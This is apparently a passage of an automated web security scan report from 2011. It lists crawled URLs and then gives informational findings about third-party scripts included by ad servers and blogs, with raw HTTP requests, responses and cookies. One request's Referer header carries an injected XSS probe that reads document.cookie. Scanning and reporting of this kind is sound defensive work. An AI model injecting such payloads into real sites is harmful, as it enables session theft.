http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22
http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html
http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html
http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html
http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html
http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html
http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html
http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html
http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html
http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html
http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html
http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html
http://www.x64bitdownload.com/drivers/
http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html
http://www.x64bitdownload.com/featured-software.html
http://www.x64bitdownload.com/linktous.html
http://www.x64bitdownload.com/new-reviews.html
http://www.x64bitdownload.com/new-software.html
http://www.x64bitdownload.com/saved-software.html
http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html
http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html
http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html
http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html
http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html
http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html
http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html
http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html
http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html
http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html
http://www.x64bitdownload.com/software-advanced.html
http://www.x64bitdownload.com/submit-pad-file.html
http://www.x64bitdownload.com/tellafriend.html
http://www.x64bitdownload.com/top-software-downloads.html
http://www.youtube.com/
http://www.youtube.com/subscribe_widget
http://www1.whdh.com/
http://www1.whdh.com/contact/
http://www1.whdh.com/contact/closed-caption-concerns
http://www1.whdh.com/eupdate/
http://www1.whdh.com/events/
http://www1.whdh.com/expedient
http://www1.whdh.com/fcc/reports
http://www1.whdh.com/features/
http://www1.whdh.com/features/articles/dish/BO144734/
http://www1.whdh.com/features/articles/dish/BO144759/
http://www1.whdh.com/features/articles/dish/BO144797/
http://www1.whdh.com/features/articles/dish/BO144833/
http://www1.whdh.com/features/articles/hank/BO144372/
http://www1.whdh.com/features/articles/hank/BO144452/
http://www1.whdh.com/features/articles/hank/BO144489/
http://www1.whdh.com/features/articles/hank/BO144588/
http://www1.whdh.com/features/articles/hiller/BO144771/
http://www1.whdh.com/features/articles/hiller/BO144776/
http://www1.whdh.com/features/articles/hiller/BO144796/
http://www1.whdh.com/features/articles/hiller/BO144813/
http://www1.whdh.com/features/articles/hiller/BO144841/
http://www1.whdh.com/features/articles/holiday_helping/BO144709/
http://www1.whdh.com/features/articles/holiday_helping/BO144719/
http://www1.whdh.com/features/articles/holiday_helping/BO144727/
http://www1.whdh.com/features/articles/holiday_helping/BO144733/
http://www1.whdh.com/features/main/dish/
http://www1.whdh.com/features/main/hank/
http://www1.whdh.com/features/main/hiller/
http://www1.whdh.com/features/main/holiday_helping/
http://www1.whdh.com/jobs/
http://www1.whdh.com/jobs/internships
http://www1.whdh.com/livesky7/
http://www1.whdh.com/news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/
http://www1.whdh.com/news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/
http://www1.whdh.com/news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/
http://www1.whdh.com/news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/
http://www1.whdh.com/news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/
http://www1.whdh.com/news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/
http://www1.whdh.com/news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/
http://www1.whdh.com/news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/
http://www1.whdh.com/news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/
http://www1.whdh.com/news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/
http://www1.whdh.com/news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/
http://www1.whdh.com/news/articles/local/12003352172056/body-found-on-dorchester-street/
http://www1.whdh.com/news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/
http://www1.whdh.com/news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/
http://www1.whdh.com/news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/
http://www1.whdh.com/news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/
http://www1.whdh.com/news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/
http://www1.whdh.com/news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/
http://www1.whdh.com/news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/
http://www1.whdh.com/news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/
http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/
http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
http://www1.whdh.com/news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/
http://www1.whdh.com/news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/
http://www1.whdh.com/news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/
http://www1.whdh.com/news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/
http://www1.whdh.com/news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/
http://www1.whdh.com/news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/
http://www1.whdh.com/news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/
http://www1.whdh.com/news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/
http://www1.whdh.com/news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/
http://www1.whdh.com/news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/
http://www1.whdh.com/news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/
http://www1.whdh.com/news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/
http://www1.whdh.com/news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/
http://www1.whdh.com/news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/
http://www1.whdh.com/news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/
http://www1.whdh.com/news/articles/sports/12003353363032/steelers-beat-jets-24-19-for-afc-title/
http://www1.whdh.com/news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/
http://www1.whdh.com/news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/
http://www1.whdh.com/news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/
http://www1.whdh.com/news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/
http://www1.whdh.com/news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/
http://www1.whdh.com/news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/
http://www1.whdh.com/news/articles/world/21003357763036/
http://www1.whdh.com/news/main/bizarre/
http://www1.whdh.com/news/main/entertainment/
http://www1.whdh.com/news/main/local/
http://www1.whdh.com/news/main/local/boston/
http://www1.whdh.com/news/main/local/capeandislands/
http://www1.whdh.com/news/main/local/metro-west/
http://www1.whdh.com/news/main/local/north/
http://www1.whdh.com/news/main/local/south/
http://www1.whdh.com/news/main/local/worcester-area/
http://www1.whdh.com/news/main/national/
http://www1.whdh.com/news/main/national/tragedy-in-tucson/
http://www1.whdh.com/news/main/politics/
http://www1.whdh.com/news/main/sports/
http://www1.whdh.com/news/main/viewervoices/
http://www1.whdh.com/news/main/world/
http://www1.whdh.com/newsteam/
http://www1.whdh.com/privacypolicy
http://www1.whdh.com/rss/
http://www1.whdh.com/sales/
http://www1.whdh.com/slideshows/view/BitterBlastTemperatures
http://www1.whdh.com/slideshows/view/FunintheSnow
http://www1.whdh.com/slideshows/view/January12thStormPets
http://www1.whdh.com/slideshows/view/January12thTreesDown
http://www1.whdh.com/slideshows/view/January18WinterStorm
http://www1.whdh.com/slideshows/view/January21SnowStorm
http://www1.whdh.com/stormforce/
http://www1.whdh.com/termsofuse
http://www1.whdh.com/traffic/
http://www1.whdh.com/video/7newslive
http://www1.whdh.com/video/player
http://www1.whdh.com/video/player/
http://www1.whdh.com/weather/
http://www1.whdh.com/weather/radar/
http://www25.big.jp/favicon.ico
http://www25.big.jp/~jam/leafnode+/
http://www3.whdh.com/mobile/phoneforecast/settings.php
http://xfactor.tweetmeme.com/
http://yoga.tweetmeme.com/
http://youtube.tweetmeme.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

21.1. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 04:25:35 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IwBhXoqWG6cd6LK1Wnmfuw7xUeE2jEhl1LXLCYCWyYXfaqaDzVRu9ZiuBStYaftYsehsFTSmKxz8H_dT-Jl0Dn1PHcIwC2PH259DCE-JXiNlms1EyPDDRa9sja6UxkO0jlMiBdP63qEMyU4eHDk40-q8V4ePnDNpIWo0aHj1LgRvDJHsqYXKmn_CAlmwlDYlAXIue8YWt2dP1w1i6rIdu3iR9sNXakr5gajG_D0roJProc_DPPlbFfwQu1oDDSlmi2JCFUPKc93aEZ1NND-p1qQrupC4PpJl2uCWF8C-Ug7j4wRYKLFggqjCsn1_kL8pjIHdY1J8-8w9PDgWrAYzcfOyBFHryCDMlf-R2G5eCIyjNutLAx_ZaCjc4v3fNB7_VoYS3R2qKw_a47HiysS2Ptmba4Y5H-dc1Uw_QN8A08AWon01KMZJGdnyaU3IkYhpl8vSxIcisdU7_DI6syvRuno3ly0Kwty7GyhLwCaCPRFlbw3kCi5E8RA9R5HEL0TwQkKr1LG0nXzayhve6FCg1-K4j840hUH4soYbPmQ_AR75b5W85bNwz4KaV3P2D8M9TEr74XNNsqzNK-NlDoE2koee6NAFwZUQriKHjx4Pi8lyVtGdZhgjkOg4zjyNGYCDxGxSj2wWaOpITs_JSH4b4_PSRyaSmsOx3lW7T78waIcqXV7j_wp0-1vNUkgqZEX-1Z-OBBuFyn0OKy4G6pkFi7MhnWmekN1sUgWlK4cJ6ZwPl8PHmUPzlA3dCSM7To-CEXwS-6XX7wB6l1yuQyAyNQyqr-I1ILvQtxafsmYbSsGstISe8YznDbRH5otKYhQ1c7hoZnPzMNOkhNZZ-ZQhp0VuruacOi0fS2cp5uhOgCNvUBrICJHG0MnjQ0lTi6GGM302hU7_HqmpQOMIOs94uLT2ikIRW2HI5LDPiT9GU4wphmnhaS5Lbu_6A1w21YanVoYS3R2qKw_a47HiysS2PuMRKxsLZPg9TZ1tzqCyX1wWon01KMZJGdnyaU3IkYhpRRau1rpsTjOMSZYu72kBgFYls0L0hUa4kAoEYLAwYiaK2oyoHzJXoHiDmJnRkYVJTEk9R7kVTBwtrIAWFE2Lc-K4j840hUH4soYbPmQ_AR7zXj5Srs3uOya3rz3JO3P2znwP73OerR98IwLdJfM5ymCpFLJLMKLPcYf5SnIJJ1X6RI9r5uj4vnBp160Ud5xaxGxSj2wWaOpITs_JSH4b42dJUeQ2EvuZijWeQdTIJ3AGO1HG2Mx-sU7H8DziP0hpSscoJJn9hy1KmH4iwQNP7d_WsBU0E-UgFoJDSWMJtyDWIg74Kyudd-aKTtXOZIlNQPO5B3pOq1-XkD73HtsCaIoA8VHGZPaw8KVYCA0sJFaKAPFRxmT2sPClWAgNLCRWXOzXCBxLcPE6Ch7Z7LiZf2G_mSPqr9HXTX3upFEF7TiBXSv_NvKrn7LHnAqX43Rx-4z7rCEzxe9AJkUnSpSWL2FWvensquNi6iS6WJOp0rE; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: fc=_vlP_vna-iwaEgLjXffa4lB9LqX0spbsp94IIPTXQBdRvy6-tKeSzr3CZDTMcZ6x1q-zg9FMZDM2f224XLr3XKafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: pf=lvGeRa5W-f1SCZ0uXnD5CFrmDV3EiuOqs3FPczWBqpKJwV9kSIzX4BtZ7vBDkFqiOBRlShVAuVmwzPtTfRLP834lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:25:35 GMT
Content-Length: 9422

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...
4429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;">\n</SCRIPT>
...[SNIP]...

21.2. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;

Request

Response

21.3. http://ads.tweetmeme.com/serve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/zone/2671

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: ded2059
Content-Length: 9103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TweetMeme Advert
...[SNIP]...
<script type='text/javascript' src='http://static.fmpub.net/zone/2671'></script>
...[SNIP]...

21.4. http://ads.tweetmeme.com/serve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/zone/2673

Request

Response

21.5. http://ads.tweetmeme.com/serve.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.tweetmeme.com
Path:	/serve.js

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

21.6. http://adserver.teracent.net/tase/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The response dynamically includes the following script from another domain:

http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

21.7. http://autotrader.dealix.com/step1.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autotrader.dealix.com
Path:	/step1.asp

Issue detail

The response dynamically includes the following script from another domain:

http://an.tacoda.net/an/12124/slf.js

Request

GET /step1.asp HTTP/1.1
Host: autotrader.dealix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.8. http://blog.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.tweetmeme.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://widgets.twimg.com/j/2/widget.js
http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

Request

GET / HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/about
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
Last-Modified: Mon, 24 Jan 2011 22:05:27 GMT
Accept-Ranges: bytes
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 22:26:24 GMT
Vary: Accept-Encoding,Cookie
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div id="flickr_badge_wrapper">
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05"></script>
...[SNIP]...

21.9. http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.tweetmeme.com
Path:	/wp-content/themes/tweetmeme-0.2/prototype.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://widgets.twimg.com/j/2/widget.js
http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

Request

GET /wp-content/themes/tweetmeme-0.2/prototype.js HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,Cookie
X-Pingback: http://blog.tweetmeme.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div id="flickr_badge_wrapper">
<script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05"></script>
...[SNIP]...

21.10. http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.tweetmeme.com
Path:	/wp-content/themes/tweetmeme-0.2/scriptaculous.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://widgets.twimg.com/j/2/widget.js
http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05

Request

GET /wp-content/themes/tweetmeme-0.2/scriptaculous.js HTTP/1.1
Host: blog.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __utmb=229010307.2.10.1295907700; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983

Response

21.11. http://brandonaaron.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://brandonaaron.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://i.simpli.fi/dpx.js?cid=107

Request

GET / HTTP/1.1
Host: brandonaaron.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:18 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.0.6
X-Runtime: 1ms
ETag: "94d9b02809d788830d3d2469636400ac"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _blog_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--43c046f6acf84405a38de8e12fc2c472b1d35a90; path=/; HttpOnly
Content-Length: 19341
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>Brandon Aaron : Blog</title>
<meta content='text/html; charset=utf-8' http-equiv='Content-type' />
<link href='/favicon.ico' rel='shortcut icon' />

...[SNIP]...
</script>
<script src='http://i.simpli.fi/dpx.js?cid=107' type='text/javascript'></script>
...[SNIP]...

21.12. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.cloudscan.us
Path:	/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/jsapi

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
